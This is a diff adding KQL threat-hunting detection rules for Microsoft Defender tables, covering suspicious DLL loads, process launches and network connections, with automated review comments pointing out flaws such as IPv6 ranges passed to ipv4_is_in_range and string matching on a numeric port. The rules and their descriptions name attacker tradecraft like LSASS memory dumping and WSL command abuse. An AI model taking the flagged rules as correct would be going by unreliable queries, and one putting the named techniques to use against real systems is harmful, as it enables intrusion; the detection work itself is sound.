+// Level: medium
+// Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.resource-development, attack.t1584, attack.t1566, detection.threat-hunting
+// False Positives:
+// - Legitimate use of WebDAV in an environment
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\\" and (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".ico" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".rar" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/image_load/amsi_dll_load_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/image_load/amsi_dll_load_by_uncommon_process.kql
new file mode 100644
index 00000000..8b9686a4
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/amsi_dll_load_by_uncommon_process.kql
@@ -0,0 +1,12 @@ +// Title: Amsi.DLL Load By Uncommon Process +// Author: frack113 +// Date: 2023-03-12 +// Level: low +// Description: Detects loading of Amsi.dll by uncommon processes +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490, detection.threat-hunting +// False Positives: +// - Legitimate third party apps installed in "ProgramData" and "AppData" might generate some false positives. Apply additional filters accordingly + +DeviceImageLoadEvents +| where FolderPath endswith "\\amsi.dll" and (not((((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and InitiatingProcessFolderPath endswith "\\ngentask.exe") or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon64.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\") or isnull(InitiatingProcessFolderPath)))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and InitiatingProcessFolderPath endswith "\\MsMpEng.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/image_load/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/image_load/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql new file mode 100644 index 00000000..32083fcb --- /dev/null 
+++ b/KQL/rules-threat-hunting/windows/image_load/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql @@ -0,0 +1,13 @@ +// Title: BITS Client BitsProxy DLL Loaded By Uncommon Process +// Author: UnicornOfHunt +// Date: 2025-06-04 +// Level: low +// Description: Detects an uncommon process loading the "BitsProxy.dll". This DLL is used when the BITS COM instance or API is used. +// This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, detection.threat-hunting +// False Positives: +// - Allowed binaries in the environment that do BITS Jobs + +DeviceImageLoadEvents +| where FolderPath endswith "\\BitsProxy.dll" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\aitstatic.exe", "C:\\Windows\\System32\\bitsadmin.exe", "C:\\Windows\\System32\\desktopimgdownldr.exe", "C:\\Windows\\System32\\DeviceEnroller.exe", "C:\\Windows\\System32\\MDMAppInstaller.exe", "C:\\Windows\\System32\\ofdeploy.exe", "C:\\Windows\\System32\\RecoveryDrive.exe", "C:\\Windows\\System32\\Speech_OneCore\\common\\SpeechModelDownload.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\OneDriveSetup.exe", "C:\\Windows\\SysWOW64\\Speech_OneCore\\Common\\SpeechModelDownload.exe")))) and (not(InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/image_load/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql b/KQL/rules-threat-hunting/windows/image_load/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql new file mode 100644 index 00000000..0bbcb478 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/image_load/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql 
@@ -0,0 +1,15 @@ +// Title: Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process +// Author: Perez Diego (@darkquassar), oscd.community, Ecco +// Date: 2019-10-27 +// Level: medium +// Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. +// The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. +// As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. +// Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001, detection.threat-hunting +// False Positives: +// - Debugging scripts might leverage this DLL in order to dump process memory for further analysis. 
+ +DeviceImageLoadEvents +| where ((FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll") and (InitiatingProcessFolderPath endswith "\\bash.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\dnx.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\monitoringhost.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\regsvcs.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\sc.exe" or InitiatingProcessFolderPath endswith "\\scriptrunner.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not((((InitiatingProcessCommandLine endswith "-k LocalServiceNetworkRestricted" or InitiatingProcessCommandLine endswith "-k WerSvcGroup") and InitiatingProcessFolderPath endswith "\\svchost.exe") or ((InitiatingProcessCommandLine contains "/d srrstr.dll,ExecuteScheduledSPPCreation" or InitiatingProcessCommandLine contains "aepdu.dll,AePduRunUpdate" or InitiatingProcessCommandLine contains "shell32.dll,OpenAs_RunDL" or InitiatingProcessCommandLine contains "Windows.Storage.ApplicationData.dll,CleanupTemporaryState") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (InitiatingProcessCommandLine endswith "\\TiWorker.exe -Embedding" and InitiatingProcessCommandLine startswith "C:\\WINDOWS\\WinSxS\\")))) \ No newline at end of file 
diff --git a/KQL/rules-threat-hunting/windows/image_load/microsoft_excel_add_in_loaded.kql b/KQL/rules-threat-hunting/windows/image_load/microsoft_excel_add_in_loaded.kql
new file mode 100644
index 00000000..1d440713
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/microsoft_excel_add_in_loaded.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Excel Add-In Loaded
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-12
+// Level: low
+// Description: Detects Microsoft Excel loading an Add-In (.xll) file
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, detection.threat-hunting
+// False Positives:
+// - The rules is only looking for ".xll" loads. So some false positives are expected with legitimate and allowed XLLs
+
+DeviceImageLoadEvents
+| where FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/image_load/microsoft_word_add_in_loaded.kql b/KQL/rules-threat-hunting/windows/image_load/microsoft_word_add_in_loaded.kql
new file mode 100644
index 00000000..c9e3405a
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/microsoft_word_add_in_loaded.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Word Add-In Loaded
+// Author: Steffen Rogge (dr0pd34d)
+// Date: 2024-07-10
+// Level: low
+// Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, detection.threat-hunting
+// False Positives:
+// - The rules is only looking for ".wll" loads. So some false positives are expected with legitimate and allowed WLLs.
+
+DeviceImageLoadEvents
+| where FolderPath endswith ".wll" and InitiatingProcessFolderPath endswith "\\winword.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/image_load/system_drawing_dll_load.kql b/KQL/rules-threat-hunting/windows/image_load/system_drawing_dll_load.kql
new file mode 100644
index 00000000..6a9853bb
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/system_drawing_dll_load.kql
@@ -0,0 +1,12 @@
+// Title: System Drawing DLL Load
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: low
+// Description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113, detection.threat-hunting
+// False Positives:
+// - False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\System.Drawing.ni.dll"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/image_load/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql b/KQL/rules-threat-hunting/windows/image_load/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
new file mode 100644
index 00000000..8e46c493
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
@@ -0,0 +1,14 @@ +// Title: Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-09-02 +// Level: low +// Description: Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory. +// The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object. +// Investigation of the loading application and its behavior is required to determining if its malicious. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting +// False Positives: +// - Some installers might generate false positives, apply additional filters accordingly. + +DeviceImageLoadEvents +| where (FolderPath endswith "\\taskschd.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "taskschd.dll") and (InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Desktop\\" or InitiatingProcessFolderPath contains "\\Downloads\\") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/image_load/wmi_module_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/image_load/wmi_module_loaded_by_uncommon_process.kql new file mode 100644 index 00000000..744926a2 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/image_load/wmi_module_loaded_by_uncommon_process.kql 
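Review bot: The first disjunct pairs `FolderPath endswith "\\taskschd.dll"` with `InitiatingProcessVersionInfoOriginalFileName =~ "taskschd.dll"`, which compares the initiating process's version resource rather than the loaded module's, so the second term can realistically never be true and the Sigma `OriginalFileName` selector on the image is silently lost. As far as I can tell DeviceImageLoadEvents exposes no OriginalFileName column for the loaded image, so the converter should either drop that clause for image_load rules or map it to a column that exists, leaving `| where FolderPath endswith "\\taskschd.dll" and (...)`. The current form is harmless because of the `or`, but it misleads a reader into thinking the DLL is also matched by its version metadata.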
@@ -0,0 +1,10 @@ +// Title: WMI Module Loaded By Uncommon Process +// Author: Roberto Rodriguez @Cyb3rWard0g +// Date: 2019-08-10 +// Level: low +// Description: Detects WMI modules being loaded by an uncommon process +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, detection.threat-hunting + +DeviceImageLoadEvents +| where (FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\WmiApRpl.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\WMINet_Utils.dll" or FolderPath endswith "\\wmiprov.dll" or FolderPath endswith "\\wmiutils.dll") and (not((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or (InitiatingProcessFolderPath endswith "\\WindowsAzureGuestAgent.exe" or InitiatingProcessFolderPath endswith "\\WaAppAgent.exe") or (InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon64.exe") or (InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe" or InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\Update.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe")))) \ No newline at end of 
file diff --git a/KQL/rules-threat-hunting/windows/network_connection/dfsvc_exe_network_connection_to_non_local_ips.kql b/KQL/rules-threat-hunting/windows/network_connection/dfsvc_exe_network_connection_to_non_local_ips.kql new file mode 100644 index 00000000..ed3e79aa --- /dev/null +++ b/KQL/rules-threat-hunting/windows/network_connection/dfsvc_exe_network_connection_to_non_local_ips.kql @@ -0,0 +1,12 @@ +// Title: Dfsvc.EXE Network Connection To Non-Local IPs +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, detection.threat-hunting +// False Positives: +// - False positives are expected from ClickOnce manifests hosted on public IPs and domains. Apply additional filters for the accepted IPs in your environement as necessary + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\dfsvc.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/network_connection/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql b/KQL/rules-threat-hunting/windows/network_connection/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql new file mode 100644 index 00000000..ef3c52e4 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/network_connection/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql 
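Review bot: The local-address exclusion hands IPv6 prefixes (`"::1/128"`, `"fe80::/10"`, `"fc00::/7"`) to `ipv4_is_in_range()`, which only parses IPv4 and returns null for anything else, so IPv6 loopback, link-local and ULA destinations are never recognised as local. For an IPv6 RemoteIP every term of the chain is null, and depending on how that null propagates through `not(...)` the row is either dropped (a genuine non-local IPv6 connection is missed) or kept (a local one is flagged); either way the intended IPv6 handling is absent. Use `ipv6_is_in_range(RemoteIP, "::1/128")`, `ipv6_is_in_range(RemoteIP, "fe80::/10")` and `ipv6_is_in_range(RemoteIP, "fc00::/7")` for those three entries. The same pattern is in the dllhost_exe_initiated_network_connection_to_non_local_ip_address hunk that follows and in the network_connection_initiated_by_powershell_process hunk.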
@@ -0,0 +1,14 @@ +// Title: Dllhost.EXE Initiated Network Connection To Non-Local IP Address +// Author: bartblaze +// Date: 2020-07-13 +// Level: medium +// Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. +// Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. +// An initial baseline is recommended before deployment. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, attack.t1559.001, detection.threat-hunting +// False Positives: +// - Communication to other corporate systems that use IP addresses from public address spaces + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "150.171.0.0/19") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24"))))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/network_connection/hh_exe_initiated_http_network_connection.kql b/KQL/rules-threat-hunting/windows/network_connection/hh_exe_initiated_http_network_connection.kql new file mode 100644 index 00000000..e24a39ac --- /dev/null +++ b/KQL/rules-threat-hunting/windows/network_connection/hh_exe_initiated_http_network_connection.kql 
@@ -0,0 +1,12 @@
+// Title: HH.EXE Initiated HTTP Network Connection
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-05
+// Level: medium
+// Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001, detection.threat-hunting
+// False Positives:
+// - False positive is expected from launching "hh.exe" for the first time on a machine in a while or simply from help files containing reference to external sources. Best correlate this with process creation and file events.
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/network_connection/msiexec_exe_initiated_network_connection_over_http.kql b/KQL/rules-threat-hunting/windows/network_connection/msiexec_exe_initiated_network_connection_over_http.kql
new file mode 100644
index 00000000..d1b38a88
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/network_connection/msiexec_exe_initiated_network_connection_over_http.kql
@@ -0,0 +1,14 @@
+// Title: Msiexec.EXE Initiated Network Connection Over HTTP
+// Author: frack113
+// Date: 2022-01-16
+// Level: low
+// Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443.
+// Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages.
+// Use this rule to hunt for potentially anomalous or suspicious communications.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007, detection.threat-hunting
+// False Positives:
+// - Likely
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\msiexec.exe"
\ No newline at end of file
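Review bot: `RemotePort in~ ("80", "443")` applies the case-insensitive string operator to string literals, but RemotePort in DeviceNetworkEvents is a numeric column, so the query either fails to compile or never matches and the rule is dead. Write it as `RemotePort in (80, 443)`. The identical expression is in the msiexec_exe_initiated_network_connection_over_http hunk on this same line and needs the same change.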
diff --git a/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_by_powershell_process.kql b/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_by_powershell_process.kql new file mode 100644 index 00000000..c043cfa7 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_by_powershell_process.kql @@ -0,0 +1,16 @@ +// Title: Network Connection Initiated By PowerShell Process +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-13 +// Level: low +// Description: Detects a network connection that was initiated from a PowerShell process. +// Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. +// Use this rule as a basis for hunting for anomalies. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.threat-hunting +// False Positives: +// - Administrative scripts +// - Microsoft IP range +// - Additional filters are required. Adjust to your environment (e.g. extend filters with company's ip range') + +DeviceNetworkEvents +| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (not((((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "51.103.210.0/23"))))) \ No newline at end of file 
diff --git a/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_from_users_public_folder.kql b/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_from_users_public_folder.kql new file mode 100644 index 00000000..8f4d2604 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_from_users_public_folder.kql @@ -0,0 +1,14 @@ +// Title: Network Connection Initiated From Users\Public Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2024-05-31 +// Level: medium +// Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder. +// Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone. +// Use this rule to hunt for potential suspicious or uncommon activity in your environement. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting +// False Positives: +// - Likely from legitimate third party application that execute from the "Public" directory. + +DeviceNetworkEvents +| where InitiatingProcessFolderPath contains ":\\Users\\Public\\" and (not(InitiatingProcessFolderPath contains ":\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/network_connection/potentially_suspicious_azure_front_door_connection.kql b/KQL/rules-threat-hunting/windows/network_connection/potentially_suspicious_azure_front_door_connection.kql new file mode 100644 index 00000000..3315f64c --- /dev/null +++ b/KQL/rules-threat-hunting/windows/network_connection/potentially_suspicious_azure_front_door_connection.kql 
@@ -0,0 +1,14 @@ +// Title: Potentially Suspicious Azure Front Door Connection +// Author: Isaac Dunham +// Date: 2024-11-07 +// Level: medium +// Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) +// that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102.002, attack.t1090.004, detection.threat-hunting +// False Positives: +// - Results are not inherently suspicious, but should be investigated during threat hunting for potential cloud C2. +// - Organization-specific Azure Front Door endpoints + +DeviceNetworkEvents +| where RemoteUrl contains "azurefd.net" and (not((InitiatingProcessFolderPath endswith "searchapp.exe" or (RemoteUrl contains "afdxtest.z01.azurefd.net" or RemoteUrl contains "fp-afd.azurefd.net" or RemoteUrl contains "fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net" or RemoteUrl contains "roxy.azurefd.net" or RemoteUrl contains "powershellinfraartifacts-gkhedzdeaghdezhr.z01.azurefd.net" or RemoteUrl contains "storage-explorer-publishing-feapcgfgbzc2cjek.b01.azurefd.net" or RemoteUrl contains "graph.azurefd.net") or (InitiatingProcessFolderPath endswith "brave.exe" or InitiatingProcessFolderPath endswith "chrome.exe" or InitiatingProcessFolderPath endswith "chromium.exe" or InitiatingProcessFolderPath endswith "firefox.exe" or InitiatingProcessFolderPath endswith "msedge.exe" or InitiatingProcessFolderPath endswith "msedgewebview2.exe" or InitiatingProcessFolderPath endswith "opera.exe" or InitiatingProcessFolderPath endswith "vivaldi.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/process_creation/arbitrary_command_execution_using_wsl.kql b/KQL/rules-threat-hunting/windows/process_creation/arbitrary_command_execution_using_wsl.kql new file mode 100644 index 00000000..2bba25c8 --- /dev/null 
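Review bot: The process exclusions match a bare file-name suffix with no leading separator (`InitiatingProcessFolderPath endswith "searchapp.exe"`, `endswith "chrome.exe"`, and the other browsers), so any executable whose name merely ends in that string, in any directory, is dropped from the hunt and the allow-list is wider than intended. Anchor each on the separator, `InitiatingProcessFolderPath endswith "\\chrome.exe"`, as the other rules in this change do, and consider pinning the browser exclusions to their expected install paths since a renamed binary in a user-writable directory should still surface here.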
+++ b/KQL/rules-threat-hunting/windows/process_creation/arbitrary_command_execution_using_wsl.kql @@ -0,0 +1,13 @@ +// Title: Arbitrary Command Execution Using WSL +// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-05 +// Level: medium +// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, detection.threat-hunting +// False Positives: +// - Automation and orchestration scripts may use this method to execute scripts etc. +// - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server) + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/process_creation/cab_file_extraction_via_wusa_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/cab_file_extraction_via_wusa_exe.kql new file mode 100644 index 00000000..a13e52d1 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/cab_file_extraction_via_wusa_exe.kql 
@@ -0,0 +1,12 @@
+// Title: Cab File Extraction Via Wusa.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-04
+// Level: medium
+// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+// - The "extract" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/clickonce_deployment_execution_dfsvc_exe_child_process.kql b/KQL/rules-threat-hunting/windows/process_creation/clickonce_deployment_execution_dfsvc_exe_child_process.kql
new file mode 100644
index 00000000..b2007261
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/clickonce_deployment_execution_dfsvc_exe_child_process.kql
@@ -0,0 +1,12 @@
+// Title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-12
+// Level: medium
+// Description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+// - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\AppData\\Local\\Apps\\2.0\\" and InitiatingProcessFolderPath endswith "\\dfsvc.exe"
\ No newline at end of file
